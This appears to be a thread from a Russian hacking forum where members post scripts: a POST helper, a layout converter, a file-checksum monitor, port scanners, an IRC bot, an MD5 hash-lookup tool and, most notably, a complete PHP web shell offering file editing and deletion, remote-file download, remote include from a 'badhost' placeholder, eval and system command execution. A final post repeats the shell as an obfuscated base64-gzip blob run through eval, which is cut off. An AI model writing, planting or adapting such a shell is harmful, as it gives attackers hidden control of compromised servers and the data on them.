приближение обьекта( в моём случае конус), и проигрывание скрипта, при приблежениии. На ВРМЛ p.s заняться было нечем
Столкнулся с проблемой. Нужно было получить данные методом POST, но каждый раз писать эту бурду конечно не удобно. Я написал функцию, которая "конвертирует" POST в GET. PHP: <? #(c) NOmeR1 function file_post_contents($url) { $url = parse_url($url); $fp = fsockopen($url['host'], 80, $errno, $errstr, 30); if(!$fp) { return false; } else { $postContents = "POST ".$url['scheme']."://".$url['host'].$url['path']." HTTP/1.0\r\n". "Host: ".$url['host']."\r\n". "Referer: ".$url['scheme']."://".$url['host'].$url['path']."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($url['query'])."\r\n\r\n". $url['query']; fputs($fp, $postContents); $result = ''; while(!feof($fp)) { $result .= fgets($fp, 128); } fclose($fp); return $result; } } echo file_post_contents('http://forum.antichat.ru/member.php?u=747'); ?>
гораздо проще можно все сделать было бы заюзав регексп: Code: #!/usr/bin/perl -w use strict; my $src = shift || die "Usage: transkey.pl <source> [destination]\n"; my $dst = shift || 'trans_'.$src; open SR, '<', $src or die "Could not open source file\n"; open DS, '>', $dst or die "Could not create destination file\n"; $/ = undef; my $text = <SR>; $text =~ tr/ ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮйцукенгшщзхъфывапролджэячсмитьбю/ QWERTYUIOP[]ASDFGHJKL;'ZXCVBNM,.qwertyuiop[]asdfghjkl;'zxcvbnm,.\//; print DS $text; close SR; close DS;
Скрипт проверяет контрольные суммы дерикторий и файлов, и отображает изминения в виде дерева. PHP: <?php set_time_limit(300); $SALT = 'sdfsd'; $mysql=array( 'host' => 'localhost', 'user' => 'root', 'pass' => '', 'base' => 'mydb' ); if (mysql_connect($mysql['host'],$mysql['user'],$mysql['pass']) == false) die(mysql_error()); @mysql_query('SET NAMES cp1251'); if (mysql_select_db($mysql['base']) == false) die(mysql_error()); $ALLFILES=array(); /*****************************************************************************************************************************/ function install() { mysql_query('DROP TABLE IF EXISTS `controlsumm`'); $qyery='CREATE TABLE `controlsumm` ( `path` VARCHAR(256), `hesh` VARCHAR(32) )'; if(mysql_query($qyery)) echo '<center><h2>Таблица `controlsumm` была создана.</h2></center>'; else echo '<center><h2>Ошибка! не удалось создать таблицу `controlsumm`.</h2></center>'; } /*****************************************************************************************************************************/ function FileHash($file) { GLOBAL $SALT; $hash=md5($file.$SALT); $fo=fopen($file,'r'); while(!feof($fo)) { $content=fread($fo,1024); $hash=md5($hash.$content); } fclose($fo); return $hash; } /*****************************************************************************************************************************/ function kolzn($str, $zn) { $kol=0; $i=strlen($str); for($j=0;$j<$i;$j++) if($str[$j] == $zn) $kol++; return $kol; } /*****************************************************************************************************************************/ function makedamp($dir) { GLOBAL $SALT; $hesh=''; $dirhesh='00000000000000000000000000000000'; $diradesk = opendir($dir); while(false !== ($name = readdir($diradesk))) { if($name == '.' || $name == '..') continue; if(filetype($dir.'/'.$name) == 'dir') $hesh=makedamp($dir.'/'.$name); else $hesh=FileHash($dir.'/'.$name); if(!mysql_query('INSERT INTO `controlsumm` VALUES (\''.mysql_escape_string($dir.'/'.$name).'\', \''.$hesh.'\')')) die(mysql_error()); $dirhesh=md5($hesh.$dirhesh); } return md5($dirhesh.$SALT); } /*****************************************************************************************************************************/ function checkall($dir) { GLOBAL $SALT,$ALLFILES; $hesh=''; $dirhesh='00000000000000000000000000000000'; $diradesk = opendir($dir); while(false !== ($name = readdir($diradesk))) { if($name == '.' || $name == '..') continue; if(filetype($dir.'/'.$name) == 'dir') { $ALLFILES[$dir.'/'.$name] = 1;; $hesh=checkall($dir.'/'.$name); $ALLFILES[$dir.'/'.$name] = $hesh; } else { $hesh=FileHash($dir.'/'.$name); $ALLFILES[$dir.'/'.$name] = $hesh; } $dirhesh=md5($hesh.$dirhesh); } return md5($dirhesh.$SALT); } /*****************************************************************************************************************************/ function viewtree() { GLOBAL $SALT,$ALLFILES; checkall('.'); foreach($ALLFILES as $path => $hesh) { for($i=kolzn($path, '/');$i>0;$i--) echo ' | '; $res=mysql_query('SELECT hesh FROM `controlsumm` WHERE `path`= \''.mysql_escape_string($path).'\' '); if(!mysql_num_rows($res)) echo '- <font color=009900>'.basename($path).'</font><br>'; else { $row=mysql_fetch_array($res, MYSQL_NUM); if($row[0] != $hesh) echo '- <font color=990000>'.basename($path).'</font><br>'; else echo '- '.basename($path).'<br>'; } } } /*****************************************************************************************************************************/ ?> <style> table.menu{ background-color: #ffffff; font-size:16px; color:#000000; text-align: center; font-family: Cursive; border:1px solid #cccccc; width: 100%; margin-top:5px; link: ffffff; } td.i { link: ffffff; border:1px solid #cccccc; font-size:13px; color: #000000; text-align: center; color:#333333; width: 11%; } input,SELECT {border:1px solid #cccccc; height: 20px;} #a{ font-size:11px; color:#333333; text-align: center; font-family: Cursive; } a{color:#999999;} </style> <script> function refreshtable() { if(confirm('Уверенны что хотите обновить таблицу хэшей?')) document.location='?p=hesh'; } function createtable() { if(confirm('Уверенны что хотите создать таблицу?')) document.location='?p=install'; } </script> <table width=80% align=center> <tr><td> <table class=menu align=center><tr> <td><a href='?p=tree'>[Дерево]</a></td> <td><a href='JavaScript:refreshtable()'>[Хэшировать]</a></td> <td><a href='JavaScript:createtable()'>[Установить]</a></td> </tr></table> </td></tr> <tr><td align=center> <br> <table style="border:1px solid #cccccc;" width=100%><tr><td align=left> <?php switch($_GET['p']) { case 'tree': viewtree(); break; case 'hesh': if(!mysql_query('DELETE FROM `controlsumm`')) die(mysql_error()); makedamp('.'); viewtree();break; case 'install': install(); break; default: viewtree(); } ?> </td></tr></table> </td></tr> </table>
Hi , I see people post they work here. There is 2 my coded perl scripts. 1. Port scanner: Code: #!/usr/bin/perl # Website: http://saime.biz # Usage: perl l33t.pl [ip] use IO::Socket; my ( $ip, $port, $endport ); $endport=1337; $port=0; # You can edit the endport .... $ip = $ARGV[0] if $ARGV[0]; $port=$ARGV[1] if $ARGV[1]; $maxport=$ARGV[2] if $ARGV[2]; print "[+]Scaning: $ip\r\n"; foreach (; $port<=$endport; $port++) { print "\n[+]Port $port is open!" if ( IO::Socket::INET->new(PeerAddr=>"$ip:$port",Proto=>'tcp',Timeout=>1)); } exit; 2. IRC Bot. Code: #!/usr/bin/perl # Options: !op , !kill , !version , !owner # Website: http://saime.biz print "http://saime.biz"; use strict; use IO::Socket; use Socket; my $server = "irc.nitrousirc.net"; my $port= '6667'; my $chanel = "#perl"; my $nick = "King`Of`Noobs"; my $identify = "ohi"; my $name = "Hithere"; my $saime = "Saime"; my $socket = new IO::Socket::INET(PeerAddr => $server, PeerPort => $port, Proto => "tcp") or die "Get a life ?"; print $socket "NICK $nick\r\n"; print $socket "USER $identify 8 * :$name\r\n"; print $socket "JOIN $chanel\r\n"; while (my $body = <$socket>) { chop $body; if ($body =~ /^PING(.*)$/i) { print $socket "PONG $1\r\n"; } if ($body =~ /^.*!version(.*)$/i) { print $socket ("PRIVMSG $chanel Saime's BOT V1.2!\r\n"); } if ($body =~ /^.*!kill(.*)$/i) { print $socket ("QUIT\r\n"); } if ($body =~ /^.*!op(.*)$/i) { print $socket ("MODE $chanel op $saime\r\n"); } if ($body =~ /^.*!owner(.*)$/i) { print $socket ("PRIVMSG $chanel Owner: YourNick\r\n"); } } More to come later.
Лучшие цитаты дня з башорга. Поставил на сайт, и каждый день свежые приколы. PHP: <? $file = file_get_contents('http://www.bash.org.ru/best'); $file = preg_match_all('|<div>(.+)</div>|U',$file,$frazes); for($i=0;$i<11;$i++){ if ($i<>5) echo "<hr>".$frazes[1][$i]."\r\n<hr>"; } ?>
А у меня отлично заработал. Попробуй создать файл 1.php с содержанием PHP: <? $file = file_get_contents('http://www.bash.org.ru/best'); $file = preg_match_all('|<div>(.+)</div>|U',$file,$frazes); for($i=0;$i<11;$i++){ if ($i<>5) echo "<hr>".$frazes[1][$i]."\r\n<hr>"; } ?> И закинь его се на сервер . У меня пашеет нормально +)
Сканер портов из списка ip адресов #!/usr/bin/perl -w # Use: # $ scan.pl IP1 [ IP2 ] PORT use IO::Socket; sub dec2hex { return sprintf "%02x",shift; } sub ip2hex { return dec2hex($1).dec2hex($2).dec2hex($3).dec2hex($4) if ( shift =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/ ); } sub hex2ip { return hex($1).".".hex($2).".".hex($3).".".hex($4) if ( shift =~ /(\w{2})(\w{2})(\w{2})(\w{2})/ ); } my ($hip1, $hip2, $port); if ( $#ARGV == 2 ){ $hip1 = ip2hex( shift @ARGV ); $hip2 = ip2hex( shift @ARGV ); $port = shift @ARGV; if ( hex( $hip1 ) > hex( $hip2 ) ){ $tmp = $hip1;$hip1 = $hip2;$hip2 = $tmp; } }elsif ( $#ARGV == 1 ){ $hip1 = ip2hex( shift @ARGV ); $hip2 = $hip1; $port = shift @ARGV; }else{ open TXT, "<$0" and <TXT> and $txt = <TXT> and $txt .= <TXT> and print $txt; close TXT; exit 1; } for ( $hip2 = dec2hex( hex( $hip2 ) + 1 ) ; ! ( $hip1 =~ /$hip2/) ; $hip1 = dec2hex( hex( $hip1 ) + 1 ) ){ $ip = hex2ip($hip1); print "[ + ] Port [ $port ] is open on host [ $ip ]\n" if ( IO::Socket::INET->new(PeerAddr=>"$ip:$port",Proto=>'tcp',Timeout=>1)); }
CGI PortScanner Code: #!/usr/bin/perl use warnings; use CGI ":standard"; use IO::Socket::INET; use strict; print header(),start_html("portscanner"); my $port = param('start'); my $ip = param('ip'); my $end = param('end'); print start_form(-method=>'POST',action=>"$ENV{'SCRIPT_NAME'}"),"IP: ",textfield(-name=>'ip'), "<br>Starting Port: ",textfield(-name=>'start',size=>'10'), "<br>Ending Port: ",textfield(-name=>'end',size=>'11'),"<br>", submit(-value=>'Scan'),end_form; if($port and $ip and $end and $ip ne '127.0.0.1' and $ip !~ m/^192\./){ open(my $log,">>/portscanner_log.txt"); print $log "$ENV{'REMOTE_ADDR'} $ip $port $end\n"; close($log); while($port<=$end){ my $socket = IO::Socket::INET -> new(PeerAddr=>$ip,PeerPort=>$port,Proto=>"tcp",Tim eout => 0.5); if($socket != 0){ print "Port $port is opened.<br>"; } $port++; } } print end_html(); MD5 Seacher Code: #!/usr/bin/perl by player use LWP::UserAgent; use HTTP::Cookies; print "[>] ++++++++++++++++++++++++++++++++++\n"; print "[>] + MD5-Searcher by -=Player=- +\n"; print "[>] ++++++++++++++++++++++++++++++++++\n"; print "\n[>] MD5-Hash: "; $usid = <STDIN>; chomp $usid; $www = new LWP::UserAgent; $sql = "http://md5.rednoize.com/?q=$usid/*"; $res = $www -> get($sql) or err(); $res -> content() =~ /"result" >(.*)</ or err(); print "\n[>] MD5.Rednoize.com\t: $1 \n\n"; $sql = "http://gdataonline.com/qkhash.php?mode=txt&hash=$usid/*"; $res = $www -> get($sql) or err(); $res -> content() =~ /<b>(.*)</ or err(); print "[>] GDataOnline.com\t: $1 \n\n"; $sql = "http://www.tydal.nu/php/sakerhet/md5.php?q=$usid/*"; $res = $www -> get($sql) or err(); $res -> content() =~ /<h5><b>(.*)</ or err(); print "[>] Tydal.nu\t\t: $1 \n\n"; $sql = "http://alimamed.pp.ru/md5/?md5e=&md5d=$usid/*"; $res = $www -> get($sql) or err(); $res -> content() =~ /àí: <b>(.*)</ or err(); print "[>] Alimamed.pp.ru\t: $1 \n\n"; $sql = "http://md5.xpzone.de/?mode=decrypt&string=$usid/*"; $res = $www -> get($sql) or err(); $res -> content() =~ /Code: <b>(.*)</ or err(); print "[>] MD5.xpzone.de\t: $1 \n\n"; $sql = "http://xml.hashreverse.com/index.php?hash=$usid/*"; $res = $www -> get($sql) or err(); $res -> content() =~ /<Result>(.*)</ or err(); print "[>] XML.Hashreverse.com\t: $1 \n\n"; sub err() {}
Вот мой веб шелл +Маленький размер (12кб) +Оптимизирован под юзание из инклудов +Все необходимые функции вебшелла +Отсутствие графики/стилей (Всего лишнего) -Работа через GET (Скоро переделаю) PHP: <?php /* PHP Mini Remote View Dir (C) I-I()/Ib Версия: 1.0 pre-realse */ $script['pr']=false;//проверка пароля $script['pa']='EOF';//Пароль $script['link']=2;//Тип ссылки(1-просто ссылка на скрипт,2-с определением выполняемого скрипта+все переданные парамтеры методом GET) $script['do_this']="show_dir";//Значение переменой $do_this по дефолту $script['now_dir']="./";//Значение переменой $now_dir по дефолту $script['now_file']="index.html";//Значение переменой $now_file по дефолту @set_magic_quotes_runtime(0); @set_time_limit(0); if(@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);} foreach ($_GET as $k=>$v){$_GET[$k] = stripslashes($v);} } if($script['pr']){if(@$_GET['key']!=$script['pa'])die();} if(@$_GET['do_this']!=null)$do_this=urldecode($_GET['do_this']); else $do_this=$script['do_this']; if(@$_GET['now_dir']!=null)$now_dir=urldecode($_GET['now_dir']); else $now_dir=$script['now_dir']; if(@$_GET['now_file']!=null)$now_file=urldecode($_GET['now_file']); else $now_file=$script['now_file']; if(($script['link']===2)) { $my_link="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."?"; foreach($_GET as $index => $val){if(($index!="do_this")&&($index!="now_dir")&&($index!="now_file"))$my_link=$my_link.$index."=".$val."&";} } else $my_link=''; $our_catalog=getcwd(); chdir($now_dir); if($do_this==="upload_file_s") { if(@file_exists($now_file)) { $file=@fopen($now_file,"r"); @ob_clean(); $filename=@basename($now_file); $filedump=@fread($file,@filesize($now_file)); fclose($file); $content_encoding=$mime_type=''; if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } } echo "<font size='-1'><hr> ".php_uname()."<br>"; if(function_exists('apache_get_version'))echo(apache_get_version()."<br>"); else echo"PHP: ".phpversion()."<br>"; echo"UID: ".getmyuid()." GID: ".getmygid()." PID: ".getmypid()."<br> <hr> Cкрипт находится в: ".$our_catalog."<br> Открыт каталог: ".getcwd()."<br> <hr> <a href='".$my_link."&now_dir=".$now_dir."'>Просмотр директорий</a><br> <a href='".$my_link."do_this=function_show&now_dir=".$now_dir."'>Работа с каталогами</a><br> <a href='".$my_link."do_this=shell_show&now_dir=".$now_dir."'>Работа с шеллом</a><br> <a href='".$my_link."do_this=mysql_show&now_dir=".$now_dir."'>Работа с MYSQL</a><br> </font> <hr> | <input type='submit' value='Назад' onclick='javascript:history.back(-1)'> | <input type='submit' value='Вперед' onclick='javascript:history.forward(+1)'> | <input type='submit' value='Вверх' onclick=\"javascript:document.location.replace('".$my_link."do_this=show_dir&now_dir=".urlencode(getcwd()."/..")."')\"> | <input type='submit' value='Домой' onclick=\"javascript:document.location.replace('".$my_link."')\"> | <hr> Путь:<input type='text' name='go_to_dir' value='".getcwd()."' size='100'> <input type='submit' value='Перейти' onclick=\"javascript:document.location.replace('".$my_link."do_this=show_dir&now_dir='+escape(go_to_dir.value));\"> <hr>"; if($do_this==="show_dir") { echo "<table width=100%> <tr><td colspan=4 align=center><b>Просмотр содержимого папки <i>".getcwd()."</i></b></tr></td> <tr><td width=35%><b>Имя</b></td><td width=15%><b>Размер</b></td><td width=10%><b>Действие</b></td><td width=20%><b>Изменен</b></td><td width=10%><b>Права</b></td><td width=10%><b>Владелец/Группа</b>"; $dh=opendir("."); while($file=readdir($dh)) { if(filetype($file)==="dir")$directories[]=$file; else $files[]=$file; } closedir($dh); if(!empty($directories)) { sort($directories); foreach($directories as $file) { echo "<tr> <td>[<a title='Open' href='".$my_link."now_dir=".urlencode($now_dir."/".$file)."'>".$file."</a>]</td> <td>DIR</td> <td>---</td> <td>".date("d-m-Y H:i",filemtime($file))."</td> <td><b><font color="; if(is_readable($file))echo 'green'; else echo 'red'; echo ">r</font><font color="; if(is_writeable($file))echo 'green'; else echo 'red'; echo ">w</font> </b></td> <td>".@fileowner($now_dir)."/".@filegroup($now_dir)."</td> </tr>\n"; } } if(!empty($files)) { sort($files); foreach($files as $file) { echo "<tr> <td><a title='Show' href='".$my_link."do_this=show_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($file)."'>".$file."</a></td> <td>".filesize($file)." байт</td> <td> <a title='Upload' href='".$my_link."do_this=upload_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($file)."' alt='Скачать'>U</a> | <a title='Modify' href='".$my_link."do_this=modify_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($file)."' alt='Редактировать'>M</a> | <a title='Delete' href='".$my_link."do_this=delete_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($file)."' alt='Удалить'>D</a> </td> <td>".date("d-m-Y H:i",filemtime($file))."</td> <td><b><font color="; if(is_readable($file))echo 'green'; else echo 'red'; echo ">r</font><font color="; if(is_writeable($file))echo 'green'; else echo 'red'; echo ">w</font> </b></td> <td>".@fileowner($now_dir)."/".@filegroup($now_dir)."</td> </tr>\n"; } } echo "</table>"; } if(strpos($do_this,"_file_s")){ echo "<center> <b>Файл ".$now_file."</b> <table width=80%> <tr> <td><a href='".$my_link."do_this=show_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($now_file)."'>Просмотр</a></td> <td><a href='".$my_link."do_this=modify_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($now_file)."'>Редактировать</a></td> <td><a href='".$my_link."do_this=delete_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($now_file)."'>Удалить</a></td> <td><a href='".$my_link."do_this=upload_file_s&now_dir=".urlencode($now_dir)."&now_file=".urlencode($now_file)."'>Загрузить</a></td> <td><a href='".$my_link."now_dir=".urlencode($now_dir)."&now_file=".urlencode($now_file)."'>Назад</a></td> </tr> </table> </center>"; if(file_exists($now_file)){ if($do_this==="show_file_s"){ $open_to_show_file=file($now_file); echo "<b><center>Просмотр</center></b><pre>"; for($i=0;$i<count($open_to_show_file);$i++)echo htmlspecialchars($open_to_show_file[$i]); echo "</pre>"; } if($do_this==="modify_file_s"){ echo "<b><center>Редактирование</center></b>\n"; if(empty($_POST['step'])){ $open_to_show_file=file($now_file); echo "<form action='".$my_link."now_dir=".urlencode($now_dir)."&now_file=".urlencode($now_file)."&do_this=modify_file_s' method='post'> <input type='hidden' name='step' value='1'> <textarea name=new_text cols='80' rows='20'>"; for($i=0;$i<count($open_to_show_file);$i++)echo htmlspecialchars($open_to_show_file[$i]); echo "</textarea><br> <input type='submit' value=Править> </form>"; }else{ $new_text=$_POST['new_text']; $file = fopen ($now_file,"w"); fputs($file, $new_text); fclose($file); echo "Готово, вроде как... <a href='".$my_link."now_dir=".base64_encode($now_dir)."&now_file=".base64_encode($now_file)."&do_this=modify_file'>Назад</a>"; } } if($do_this==="delete_file_s"){ echo "<b><center>Удаление</center></b>\n"; unlink($now_file); if(file_exists($now_file))echo "Файл не был удален... Возможно нет доступа"; else echo "Файл удален..."; } }else echo "Файл не найден"; } if($do_this==="function_show"){ echo "<hr><b>Создать файл</b><br> <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_create_file' method='post'> Файл: <input type='text' name='patch_file' value='".getcwd()."\\shell.php'><br> Содержимое:<br> <textarea name='body_file' cols='80' rows='20'>Вот это будет находится в новом файле... :)</textarea><br> <input type='submit' value='СОЗДАТЬ'> </form> <hr><b>Закачать файл с другого сервера</b> <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_download_file' method='post'> Файл на другом сервере: <input type='text' name='patch_old_file' value='http://www.badhost.ru/new_shell.txt'><br> Сохранить как: <input type='text' name='patch_new_file' value='".getcwd()."\\shell2.php'><br> <input type='submit' value='ЗАКАЧАТЬ'> </form> <hr><b>Создать папку</b> <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_create_dir' method='post'> Путь: <input type='text' name='patch_dir' value='".getcwd()."\\new_folder\'><br> <input type='submit' value='СОЗДАТЬ'> </form> <hr><b>Удалить папку (только пустую)</b> <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_delete_dir' method='post'> Путь: <input type='text' name='patch_dir' value='".getcwd()."\\del_folder\'><br> <input type='submit' value='УДАЛИТЬ'> </form>"; } if($do_this==="function_create_file") { $file=fopen ($_POST['patch_file'],"w"); fputs($file, $_POST['body_file']); fclose($file); echo "Готово... <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_show'>Назад</a>"; } if($do_this==="function_download_file"){ $patch_open_file=$_POST['patch_old_file']; $save_file=$_POST['patch_new_file']; $open_file=file($patch_open_file); $file_s=fopen($save_file,"w"); foreach($open_file as $val)fputs($file_s,$val); fclose($file_s); echo "Готово... <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_show'>Назад</a>"; } if($do_this==="function_create_dir"){ mkdir($_POST['patch_dir'] , 0777); echo "Готово... <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_show'>Назад</a>"; } if($do_this==="function_delete_dir"){ rmdir($_POST['patch_dir']); echo "Готово... <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=function_show'>Назад</a>"; } if(($do_this==="mysql_show")||($do_this==="mysql_exec")){ echo '<form action="'.$my_link."now_dir=".urlencode($now_dir).'&do_this=mysql_exec" method="post"> Подключаться: <input type="checkbox" name="connect" value="1" checked><br> <input type="text" name="my_sqlhost" value="'; if(!empty($_POST['my_sqlhost']))echo $_POST['my_sqlhost']; echo '">:Хост MYSQL<br><input type="text" name="my_database" value="'; if(!empty($_POST['my_database']))echo $_POST['my_database']; echo '">:Имя базы<br><input type="text" name="mysql_login" value="'; if(!empty($_POST['mysql_login']))echo $_POST['mysql_login']; echo '">:Логин<br><input type="text" name="mysql_password" value="'; if(!empty($_POST['mysql_password']))echo $_POST['mysql_password']; echo '">:Пароль<br>Запрос:<br><textarea name="query" cols="30" rows="7">'; if(!empty($_POST['query']))echo $_POST['query']; echo '</textarea><br><input type="submit" value="Выполнить"></form><hr>'."\n"; } if($do_this==="mysql_exec") { if((!empty($_POST['my_sqlhost']))&&(!empty($_POST['mysql_login']))&&(@$_POST['connect']==='1')){ $_POST['query']=urldecode($_POST['query']); $link=mysql_connect($_POST['my_sqlhost'],$_POST['mysql_login'],$_POST['mysql_password']) or die ("Нет соединения с хостом"); if(!empty($_POST['my_database']))mysql_select_db($_POST['my_database']); } if(!empty($_POST['query'])){ $result = mysql_query($_POST['query']); if(empty($result))echo(mysql_error()); else{ echo "<table border=1>"; while($data=mysql_fetch_row($result))echo "<tr><td>".implode("</td><td>", $data)."</td></tr>"."\n"; echo "</table>"; mysql_free_result($result); } } } if($do_this==="shell_show"){ echo "<hr><b>Заинклудить файл</b> <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=shell_inc' method='post'> Путь: <input type='text' name='patch_include' value='http://www.badhost.ru/shell.php'><br> <input type='submit' value='Инклудить'> </form> <hr><b>Выполнить пхп код</b> (не пишите <?php и ?>) <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=shell_eval' method='post'> Код:<br> <textarea name='eval_code' cols='80' rows='20'></textarea> <br> <input type='submit' value='Выполнить'> </form> <hr><b>Команадная строка</b> <form action='".$my_link."now_dir=".urlencode($now_dir)."&do_this=shell_system' method='post'> Код:<br> <textarea name='system_code' cols='80' rows='20'></textarea> <br> <input type='submit' value='Выполнить'> </form>"; } if($do_this==="shell_inc"){ include($_POST['patch_include']); echo "<hr> <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=shell_show'>Назад</a>"; } if($do_this==="shell_eval"){ eval($_POST['eval_code']); echo "<hr> <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=shell_show'>Назад</a>"; } if($do_this==="shell_system"){ system($_POST['system_code']); echo "<hr> <a href='".$my_link."now_dir=".urlencode($now_dir)."&do_this=shell_show'>Назад</a>"; } echo "<hr> <b>PHP Mini Remote View Dir v1.0 pre-realese</b> © <i><b>I-I()/Ib</b></i>"; ?>
Ах да... вот еще тот же самый шелл упакован gzip-ом до 4.7 кб PHP: <?php $script['pr']=false; $script['pa']='EOF'; $script['link']=2; $script['do_this']="show_dir"; $script['now_dir']="./"; $script['now_file']="index.html"; eval(gzuncompress(base64_decode('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